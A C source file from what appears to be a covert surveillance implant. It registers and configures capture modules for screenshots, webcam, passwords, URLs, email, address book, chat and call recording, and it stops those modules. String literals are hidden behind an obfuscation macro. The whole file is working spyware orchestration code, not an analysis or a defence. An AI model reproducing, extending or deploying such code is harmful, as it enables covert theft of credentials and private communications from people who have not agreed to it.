#define _XOPEN_SOURCE

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>

#include "module.h"
#include "config.h"
#include "so.h"
#include "me.h"

module_t modulelist[] = {
   MODULE_SCREENSHOT_ENTRY,
   MODULE_DEVICE_ENTRY,
   MODULE_APPLICATION_ENTRY,
   MODULE_POSITION_ENTRY,
   MODULE_CAMERA_ENTRY,
   MODULE_MOUSE_ENTRY,
   MODULE_PASSWORD_ENTRY,
   MODULE_URL_ENTRY,
   MODULE_MESSAGES_ENTRY,
   MODULE_ADDRESSBOOK_ENTRY,
   MODULE_CHAT_ENTRY,
   MODULE_CALL_ENTRY
};

static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;

void parsemodules(json_object *config)
{
   int i;
   json_object *modules, *m, *sm, *ssm;
   int modulec;
   char *name, *v;
   struct tm tm;

   pthread_mutex_lock(&mutex);

   for(i = 0; i < (sizeof(modulelist) / sizeof(module_t)); i++) if(modulelist[i].param) free(modulelist[i].param);

   modules = json_object_object_get(config, SO"modules");
   modulec = json_object_array_length(modules);

   for(i = 0; i < modulec; i++) {
      m = json_object_array_get_idx(modules, i);
      get_string(m, SO"module", &name);

      if(!strcmp(name, SO"screenshot")) {
         MODULE_SCREENSHOT.param = malloc(sizeof(module_screenshot_t));
         get_string(m, SO"quality", &v);
         if(!strcmp(v, SO"lo")) {
            ((module_screenshot_t *)MODULE_SCREENSHOT.param)->quality = 30;
         } else if(!strcmp(v, SO"med")) {
            ((module_screenshot_t *)MODULE_SCREENSHOT.param)->quality = 60;
         } else {
            ((module_screenshot_t *)MODULE_SCREENSHOT.param)->quality = 90;
         }
      } else if(!strcmp(name, SO"camera")) {
         MODULE_CAMERA.param = malloc(sizeof(module_camera_t));
         get_string(m, SO"quality", &v);
         if(!strcmp(v, SO"lo")) {
            ((module_camera_t *)MODULE_CAMERA.param)->quality = 30;
         } else if(!strcmp(v, SO"med")) {
            ((module_camera_t *)MODULE_CAMERA.param)->quality = 60;
         } else {
            ((module_camera_t *)MODULE_CAMERA.param)->quality = 90;
         }
      } else if(!strcmp(name, SO"mouse")) {
         MODULE_MOUSE.param = malloc(sizeof(module_mouse_t));
         get_int(m, SO"width", ((int *)&((module_mouse_t *)MODULE_MOUSE.param)->width));
         get_int(m, SO"height", ((int *)&((module_mouse_t *)MODULE_MOUSE.param)->height));
      } else if(!strcmp(name, SO"messages")) {
         MODULE_MESSAGES.param = malloc(sizeof(module_messages_t));
         sm = json_object_object_get(m, SO"mail");
         get_boolean(sm, SO"enabled", &MODULE_MESSAGES_P->enabled);
         ssm = json_object_object_get(sm, SO"filter");
         get_int(ssm, SO"maxsize", &MODULE_MESSAGES_P->maxsize);
         get_string(ssm, SO"datefrom", &v);
         strptime(v, "%Y-%m-%d %H:%M:%S", &tm);
         MODULE_MESSAGES_P->from = mktime(&tm);
         get_string(ssm, SO"dateto", &v);
         strptime(v, "%Y-%m-%d %H:%M:%S", &tm);
         MODULE_MESSAGES_P->to = mktime(&tm);
      } else if(!strcmp(name, SO"call")) {
         MODULE_CALL.param = malloc(sizeof(module_call_t));
         get_boolean(m, SO"enabled", &MODULE_CALL_P->record);
         get_int(m, SO"compression", &MODULE_CALL_P->compression);
         get_int(m, SO"buffer", &MODULE_CALL_P->bufsize);
      }
   }

   pthread_mutex_unlock(&mutex);

   return;
}

void stopmodule(void)
{
   if(MODULE_PASSWORD.status != MODULE_STOPPED) {
      debugme("Stopping PASSWORD\n");
      MODULE_PASSWORD.status = MODULE_STOPPING;
      while(MODULE_PASSWORD.status != MODULE_STOPPED) sleep(1);
      debugme("PASSWORD stopped\n");
   }
   if(MODULE_URL.status != MODULE_STOPPED) {
      debugme("Stopping URL\n");
      MODULE_URL.status = MODULE_STOPPING;
      while(MODULE_URL.status != MODULE_STOPPED) sleep(1);
      debugme("URL stopped\n");
   }
   if(MODULE_MOUSE.status != MODULE_STOPPED) {
      debugme("Stopping MOUSE\n");
      MODULE_MOUSE.status = MODULE_STOPPING;
      while(MODULE_MOUSE.status != MODULE_STOPPED) sleep(1);
      debugme("MOUSE stopped\n");
   }
   if(MODULE_MESSAGES.status != MODULE_STOPPED) {
      debugme("Stopping MESSAGES\n");
      MODULE_MESSAGES.status = MODULE_STOPPING;
      while(MODULE_MESSAGES.status != MODULE_STOPPED) sleep(1);
      debugme("MESSAGES stopped\n");
   }
   if(MODULE_ADDRESSBOOK.status != MODULE_STOPPED) {
      debugme("Stopping ADDRESSBOOK\n");
      MODULE_ADDRESSBOOK.status = MODULE_STOPPING;
      while(MODULE_ADDRESSBOOK.status != MODULE_STOPPED) sleep(1);
      debugme("ADDRESSBOOK stopped\n");
   }
   if(MODULE_CHAT.status != MODULE_STOPPED) {
      debugme("Stopping CHAT\n");
      MODULE_CHAT.status = MODULE_STOPPING;
      while(MODULE_CHAT.status != MODULE_STOPPED) sleep(1);
      debugme("CHAT stopped\n");
   }

   return;
}

